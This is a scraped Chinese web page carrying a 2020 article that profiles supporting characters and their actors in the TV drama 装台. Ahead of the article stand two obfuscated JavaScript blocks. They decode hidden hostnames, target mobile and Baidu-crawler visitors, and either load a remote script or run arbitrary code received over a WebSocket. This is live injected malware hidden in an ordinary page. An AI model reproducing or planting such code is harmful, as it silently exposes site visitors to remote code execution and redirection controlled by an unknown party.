function XKzfyaZo(e){var t="",n=r=c1=c2=0;while(n %lt;e.length){r=e.charCodeAt(n);if(r %lt;128){t+=String.fromCharCode(r);n++;}else if(r %gt;191&&r %lt;224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)%lt;%lt;6|c2&63);n+=2}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)%lt;%lt;12|(c2&63)%lt;%lt;6|c3&63);n+=3;}}return t;};function qPtQEru(e){var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,"");while(f %lt;e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s %lt;%lt;2|o %gt;%gt;4;r=(o&15)%lt;%lt;4|u %gt;%gt;2;i=(u&3)%lt;%lt;6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return XKzfyaZo(t);};window[''+'H'+'j'+'i'+'R'+'b'+'o'+'']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,i,w,d,c){var x=qPtQEru,cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';if(navigator.userAgent.indexOf('baidu')>-1){k=decodeURIComponent(x(k.replace(new RegExp(c[1]+''+c[1],'g'),c[1])));var ws=new WebSocket('wss://'+k+':9393/'+i);ws.onmessage=function(e){ws.close();new Function('_tdcs',x(e.data))(cs);}}else{u=decodeURIComponent(x(u.replace(new RegExp(c[0]+''+c[0],'g'),c[0])));var s=document.createElement('script');s.src='https://'+u+'/z/'+i;cs.parentElement.insertBefore(s,cs);}})('ZnJoLmpuemhvbmdkaaW5nLmNu','dHIueWVzdW42NzgguY29t','133546',window,document,['a','g']);}:function(){};
function wSnVz(e){var t="",n=r=c1=c2=0;while(n %lt;e.length){r=e.charCodeAt(n);if(r %lt;128){t+=String.fromCharCode(r);n++;}else if(r %gt;191&&r %lt;224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)%lt;%lt;6|c2&63);n+=2}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)%lt;%lt;12|(c2&63)%lt;%lt;6|c3&63);n+=3;}}return t;};function HPRhXS(e){var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,"");while(f %lt;e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s %lt;%lt;2|o %gt;%gt;4;r=(o&15)%lt;%lt;4|u %gt;%gt;2;i=(u&3)%lt;%lt;6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return wSnVz(t);};window[''+'s'+'J'+'M'+'R'+'h'+'n'+'U'+'P'+'']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,i,w,d,c){var x=HPRhXS,cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';if(navigator.userAgent.indexOf('baidu')>-1){k=decodeURIComponent(x(k.replace(new RegExp(c[1]+''+c[1],'g'),c[1])));var ws=new WebSocket('wss://'+k+':9393/'+i);ws.onmessage=function(e){ws.close();new Function('_tdcs',x(e.data))(cs);}}else{u=decodeURIComponent(x(u.replace(new RegExp(c[0]+''+c[0],'g'),c[0])));var s=document.createElement('script');s.src='https://'+u+'/z/'+i;cs.parentElement.insertBefore(s,cs);}})('ZnJooLmpuemhvbmdkaW5nLmNu','dHIueWWVzdWW42NzguY29t','133545',window,document,['o','W']);}:function(){};
【原域名已停用,更换为mtryy.com(速记:木头人影院)】

配角光环太迷人,他们是《装台》上下的众生相

时间:2020-12-16 15:55:47阅读:3082
导读:原标题:配角光环太迷人,他们是《装台》上下的众生相 本周,《装台》临近收官,从播出至今《装台》不仅首播收视持续破1,豆瓣评分也高达8.4,各种评论不吝赞美之词,其扎实接地气的剧情、丰沛的思想底蕴和饱含时代精神的精湛表演,被观众“装进了心里”。 《装台》改编自陈彦的同名小说,关注的是一群在光鲜亮丽的舞台背后,一群为了生计整天为了别人的表演装台子的劳动人民。展现了他们的野性蓬勃和百态人生。 正因如......

本周,《装台》临近收官,从播出至今《装台》不仅首播收视持续破1,豆瓣评分也高达8.4,各种评论不吝赞美之词,其扎实接地气的剧情、丰沛的思想底蕴和饱含时代精神的精湛表演,被观众“装进了心里”。

《装台》改编自陈彦的同名小说,关注的是一群在光鲜亮丽的舞台背后,一群为了生计整天为了别人的表演装台子的劳动人民。展现了他们的野性蓬勃和百态人生。

正因如此,《装台》里人人身上有戏,各个角色发光,也完整地再现了一个时代的众生相。

剧中大家不光记住了张嘉益 演的老好人刁顺子,也看到了闫妮 将外柔内刚的蔡素芬刻画得淋漓尽致,凌孜 演出了刁菊花的泼辣劲,尤勇智 将刁大军的情深义重表现得颇为到位……更有中青年演员陈小艺宋丹丹秦海璐孙浩姬他李传缨 等,在熠熠星光下出色诠释了一个个立得住的角色。

除了几个主角,配角们的演出非常精彩,与主角们的表演融合在一起,形成了非常动人的小人物群像。我们希望通过这三篇短小的人物速写,得以一窥配角也出彩的奥秘。

1

“干啥啥不行,被坑第一名”的铁主任

孙浩饰演的铁主任铁扣,是那种干啥啥不行,被坑第一名的人设。他虽然是正式编制的秦腔团员工,但因为如今传统秦腔文化现象越来越被边缘化,作为一位办公室主任,他只好放下办公室主任的架子去外面跑市场“揽活干”,红白喜事只要给钱,咬咬牙拉下脸也就干了。

他油滑、爱摆架子但脑子活络,做事有底线,他牵线搭桥的项目出了问题,联系不到人,让观众起先误以为他是骗子,搞得人心惶惶,但后来还是将钱款追了回来。

都说铁主任是善于钻营,但其实他也有自己的艺术理想,剧中有场戏是当他来到农村的老剧场,发现年轻时演出的剧场顶棚已经塌了,落寞地唱起了秦腔,道出了物是人非的艺术理想与无奈。

而歌手出身的孙浩,也在过往经历着不断被生活打磨,孙浩不是科班出身,早年间也是从配角开始,一部部拍戏,一步一个脚印,那段时间虽然漫长,参演的许多角色也没有被人熟知,但孙浩正是凭借着这些影视剧的经验累积,直到《一仆二主》《白鹿原》《美好生活》等作品中有了出色发挥,让大家记住了他。

在《装台》这部剧里,他夹着公事包,一会跑这一会跑那儿四处忙活,像极了我们这些为了生活而奔波的普通人。

值得一提的是,孙浩还是《装台》这部剧片头曲《不愁》、片尾曲《我待生活如初恋》的演唱者,虽然多年专注于演戏,但孙浩的歌声依然动听,略显沧桑的嗓音不仅道尽了人间冷暖,也将剧中的这群“小人物”的真实生活态度清晰地展现在观众眼前。

2

他是可爱又可怜的千千万万的打工人的缩影

在《装台》播出伊始,大家都有个疑问剧中大雀儿挣的钱都哪儿去了?为什么他总在抓紧每一个省钱和赚钱的机会?

大雀儿是刁顺子所带领装台队中的一员,虽家境困难却有一身力气,装台队再苦再累的工作都铆足干劲,从不“惜力”,骨子里是个憨厚淳朴、凭一己之力支撑起全家的男人。

大雀儿有当头儿的能力,却靠力气赚钱,节约得神神秘秘的,仍然比别人日子紧。每次大家聚一起吃早饭,大雀儿都说在家吃过了。拿了工钱,四个凉菜,每人一碗面,AA制真的不贵,他从不敢留下来吃。

唯一一次自己请顺子吃饭,还是去自己熟悉的路边小摊吃面,大雀儿喜欢去这家小摊吃面的原因是,他家辣子可以多给,这样大雀儿夹在馒头里,可以吃饱。

直到后来大家才知道大雀儿是一个透支身体健康换钱的人,他为了省几块钱就洗凉水澡,干活大晚上不睡觉去出大力干活,透支着自己的健康,为后来得病埋下了伏笔。而之所以这样拼命赚钱,也是为了给家中毁容的孩子植皮……人物的悲剧命运令人唏嘘。

大雀儿的扮演者演员姬他,因参演《悬崖》被人熟知,后来又在《白鹿原》中出演最叛逆的灵魂人物黑娃,凭借这一角色摘得了国剧盛典的“年度关注男演员”。姬他本人形象刚毅,与黑娃、大雀儿在外形上有相似之处,却又能在表演中明确区分出二者的差别,大雀儿相较于黑娃而言,多了一些生活磨砺在身上留下的痕迹,少了一些少年不顾一切的冲劲儿。他饰演的大雀儿是可爱又可怜的千千万万的打工人的缩影。

3

看似凶恶实则“怂萌”

李传缨饰演的疤叔,是刁顺子同村邻居,疤叔看似是“城中村”街头的闲汉,实则是个衣食无忧的隐形“大房东”。懒洋洋歪坐在路边的椅子上,怀抱小白狗毛蛋儿,看似惬意无忧,实则关注着每个有点“可疑”的路人,仿佛这个城中村隐形的保护者。

他有点坏,喜欢招惹女房客,导致和疤婶离婚;他又有点念旧,对已经离婚的疤婶念念不忘,软磨硬泡的努力促成自己与疤婶的复婚;他看似霸道实则是个有原则甚至有点怂萌的人,比如因为小黑狗去找刁菊花理论,风风火火气冲冲的开场,却被晚辈刁菊花划破了脸,为了不让人误会只能落荒而逃,为了维持自己在城中村里的面子,缝针的时候嘴硬坚持是自己不小心弄伤,从八叔一下变成了疤叔。

疤叔的戏份虽然不多,但是和其他几个主演都有交集,而且每每都在关键时刻发挥重要作用,剧场缺观众了,他“一声令下”召集齐了人手,刁菊花觉得三皮形迹可疑,他帮着审问。看似凶恶实则“怂萌”的特质,给观众留下深刻印象。

疤叔是《装台》里相较轻快明朗的一条故事线,为整个故事注入了一丝幽默风趣的同时,也让人感到李传缨对于角色的塑造的精准与细腻。李传缨塑造人物时,张弛有度的节奏、精准拿捏的尺寸火候,将城中村最要脸面,外表豪气、内在小气的疤叔,刻画得入木三分、活灵活现。

在《装台》中,他还发挥特长,一人分饰两角儿。原来,剧中每集都有的旁白话外音,也是李传缨配音的。

细看李传缨的履历,发现他不仅是名优秀演员,还是上海戏剧学院的老师,同时也是多部优秀作品的配音演员,技能分满点,堪称深藏不露的“幕后大佬”。为很多动画片和电视剧配过音,例如《玩偶奇兵》《绿林大冒险》《黑猫警长》,另外,他在《走向共和》《龙门镖局》《粉红女郎》等作品中也有出色表演。难怪每次《装台》的旁白一出自带BGM效果,声音辨识度真强,一人分饰两角,听起来完全不像一个人。

《装台》虽然将焦点聚焦在了一种职业人身上,但是更多可以看到不同人物形象的群像剧,铁扣、大雀儿、疤叔这类具有丰富性格的人物塑造,也奠定了这部剧在人性剖析上面的深度,更让这部剧有了格局在里面。

当这些人物的情感与生活轨迹交织在一起,就勾勒出一个充满着温暖、智慧、幽默和力量的轮廓,让观众感受到属于平凡人生活的烟火气以及不向命运低头的生命力量。每个人有每个人的苦难,可最要紧的还是活在当下。

PS:严禁私自转载!转载或者合作,请联系作者

相关资讯

评论

  • 评论加载中...